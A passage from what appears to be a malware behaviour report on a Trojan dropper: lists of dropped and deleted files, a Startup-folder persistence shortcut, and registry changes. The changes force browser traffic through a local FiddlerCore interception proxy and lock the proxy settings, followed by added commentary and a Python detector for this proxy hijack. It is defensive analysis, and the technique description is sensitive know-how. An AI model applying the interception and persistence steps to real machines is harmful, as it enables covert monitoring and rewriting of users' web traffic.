%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns35.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns58.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns76.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns38.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns33.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns60.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns52.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns75.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA0.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns43.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns99.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB0.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns31.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns66.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns36.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns41.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns32.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns96.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns93.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns49.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns84.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns86.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns50.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns68.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns97.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns81.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns59.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns53.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns45.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns48.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns85.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns98.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns70.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns39.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns73.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns30.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns79.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns37.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns69.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns71.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns94.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns63.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns44.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns87.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns47.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns90.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns62.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns92.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns72.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns56.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns77.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns65.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns55.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns80.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns89.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns57.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns61.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns64.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4B.tmp (0 bytes)

The process vchk.exe:456 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsrC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB.tmp (0 bytes)

The process internetport3.exe:1088 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ML3M60RP\desktop.ini (67 bytes)
C:\a\loogg2.txt (240 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HQR7BMVW\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IYXZ7PKS\desktop.ini (67 bytes)
C:\a\logff.txt (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8MWF95DD\desktop.ini (67 bytes)

The process %original file name%.exe:348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s). The nsi2.tmp directory is the dropper's NSIS installer plugin directory: inetc.dll, UAC.dll, AccessControl.dll, SimpleFC.dll and System.dll are standard NSIS plugins for HTTP downloads, UAC elevation, ACL changes, Windows Firewall rules and native API calls respectively. The intr.lnk shortcut in the current user's Startup folder is the persistence mechanism (it runs at every logon of that user); the payload components are staged under C:\a and %Program Files%\FastInternet:

C:\a\FiddlerCore.dll (9485 bytes)
C:\a\zuur.txt (2 bytes)
C:\a\internetport3.exe (10 bytes)
C:\a\wcheckf.exe (397 bytes)
C:\a\zhho.txt (3 bytes)
C:\a\zvchk.txt (3 bytes)
C:\a\EG9650tGGrxO3Eyr78zW.exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\AccessControl.dll (13 bytes)
%Program Files%\FastInternet\app.exe (1078 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HQR7BMVW\bdcount[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ML3M60RP\uniqueEG9650tGGrxO3Eyr78zW[1].htm (10 bytes)
C:\a\winonit.exe (435 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8MWF95DD\EG9650tGGrxO3Eyr78zW[1].exe (3808 bytes)
C:\a\ayyyyy.txt (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\UAC.dll (13 bytes)
C:\a\ukey.ini (27 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\pwgen.dll (17 bytes)
C:\a\uniqueEG9650tGGrxO3Eyr78zW.ini (10 bytes)
C:\a\zvv.txt (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IYXZ7PKS\cki[1].htm (11 bytes)
C:\a\ver.ini (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\SimpleFC.dll (5289 bytes)
C:\a\getcap.exe (10027 bytes)
C:\a\5ddzT3JjRl.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\intr.lnk (527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp (4 bytes)
%Program Files%\FastInternet\dotuninstall.exe (1084 bytes)
C:\a\wincheckfe.exe (778 bytes)
C:\a\72870850.bat (287 bytes)
%System%\73581819.bat (19 bytes)
C:\a\install.txt (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\pwgen.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\UAC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\SimpleFC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\AccessControl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\inetc.dll (0 bytes)

Registry activity

The process winonit.exe:892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 03 00 00 00 28 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

Together with "ProxyEnable" = "1" these two values route all of the current user's HTTP and HTTPS traffic through a proxy listening on the local host at port 8877. "<-loopback>" is not a bypass entry: it removes WinINet's built-in exception for loopback addresses, so even requests to 127.0.0.1 go through the proxy. Combined with the dropped C:\a\FiddlerCore.dll this is the fingerprint of a local FiddlerCore-based interception proxy that can observe and rewrite the user's web traffic (HTTPS content only if a trusted root certificate is also installed, which this report does not show). The deletion of "AutoConfigURL" further down removes any existing auto-config script so that the manual proxy takes effect.

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 78 C0 D7 BA FC ED 29 95 A7 6F 3B 26 A6 D5 9D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies the IE security-zone map so that all network paths (UNC paths) are treated as belonging to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies the IE security-zone map so that all sites that bypass the proxy server are treated as belonging to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies the IE security-zone map so that all local (intranet) sites not listed in another zone, i.e. host names without dots, are treated as belonging to the Intranet Zone:

"IntranetName" = "1"

On Windows XP these three values are also IE's default Local intranet settings, so on their own they are weak indicators; the proxy values above are the significant change.

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
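The proxy values written by winonit.exe above are the security-relevant part of this report. As an added example, not from the original report or from Lavasoft, the following Python parses a report excerpt in this page's own `[key]` / `"name" = "value"` listing format and applies a few detection rules for a browser proxy hijack. The excerpt embedded in the code is constructed from the values listed above for winonit.exe:892 plus the Control Panel "proxy" policy listed further down for EG9650tGGrxO3Ey:1932; the finding names and the rules themselves are the example's own assumptions, not part of the report.

```python
"""Added example (not part of the original Lavasoft report): parse the
registry-activity listing of a report like this one and flag a browser
proxy hijack. SAMPLE is a constructed excerpt built from the values the
report lists for winonit.exe:892 plus the Control Panel "proxy" policy it
lists for EG9650tGGrxO3Ey:1932; finding names and rules are assumptions."""
import re
from ipaddress import ip_address

IS_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
ZONEMAP_KEY = IS_KEY + r"\ZoneMap"
PROXY_UI_POLICY = r"HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel"

SAMPLE = r"""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

"ProxyOverride" = "<-loopback>"

"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

"ProxyBypass" = "1"

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"""

KEY_RE = re.compile(r'^\[(.+)\]$')            # [HKCU\...] header line
SET_RE = re.compile(r'^"([^"]+)" = "(.*)"$')  # "name" = "value"
DEL_RE = re.compile(r'^"([^"]+)"$')           # bare "name" in a delete list


def parse_registry_section(text):
    """Return ({(key, name): value}, {(key, name) deleted}). A [key] line stays
    current until the next one, so value lines after a blank still belong to it."""
    set_values, deleted, key, mode = {}, set(), None, "set"
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if "deletes the following value" in line:
            mode = "deleted"
            continue
        if "creates and/or sets" in line:
            mode = "set"
            continue
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = SET_RE.match(line)
        if m and key:
            set_values[(key, m.group(1))] = m.group(2)
            continue
        m = DEL_RE.match(line)
        if m and key and mode == "deleted":
            deleted.add((key, m.group(1)))
    return set_values, deleted


def parse_proxy_server(value):
    """Split a WinINet ProxyServer string ("scheme=host:port;..." or a bare
    "host:port" for all schemes) into (scheme, host, port); IPv4/DNS hosts only."""
    entries = []
    for item in filter(None, value.split(";")):
        scheme, _, hostport = item.rpartition("=")
        host, sep, port = hostport.rpartition(":")
        if not sep:                       # no port given
            host, port = hostport, ""
        entries.append((scheme or "*", host, int(port) if port else None))
    return entries


def is_loopback(host):
    if host.lower() == "localhost":
        return True
    try:
        return ip_address(host).is_loopback
    except ValueError:                    # a DNS name, not an address
        return False


def assess(set_values, deleted):
    """Apply the hijack rules; returns a list of (finding_id, detail)."""
    findings = []
    proxies = parse_proxy_server(set_values.get((IS_KEY, "ProxyServer"), ""))
    local = [p for p in proxies if is_loopback(p[1])]
    if set_values.get((IS_KEY, "ProxyEnable")) == "1" and local:
        findings.append(("loopback_proxy", ", ".join("%s via %s:%s" % p for p in local)))
    if "<-loopback>" in set_values.get((IS_KEY, "ProxyOverride"), ""):
        findings.append(("loopback_not_bypassed", "WinINet loopback exception removed"))
    if (IS_KEY, "AutoConfigURL") in deleted:
        findings.append(("pac_removed", "existing auto-config script URL deleted"))
    widened = [n for n in ("UNCAsIntranet", "ProxyBypass", "IntranetName")
               if set_values.get((ZONEMAP_KEY, n)) == "1"]
    if widened:
        findings.append(("intranet_zone_widened", ", ".join(widened)))
    if set_values.get((PROXY_UI_POLICY, "proxy")) == "1":
        findings.append(("proxy_ui_locked", "IE proxy settings page disabled by policy"))
    return findings


if __name__ == "__main__":
    for finding_id, detail in assess(*parse_registry_section(SAMPLE)):
        print(finding_id, "-", detail)
```

The parser keeps the last `[key]` header as context across blank lines, which is how this report format groups values; the rules only fire on a loopback proxy when "ProxyEnable" is also "1", so a leftover "ProxyServer" value with the proxy switched off does not trigger them.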

The process EG9650tGGrxO3Ey:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Po"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 03 00 00 00 28 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxySettingsPerUser" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
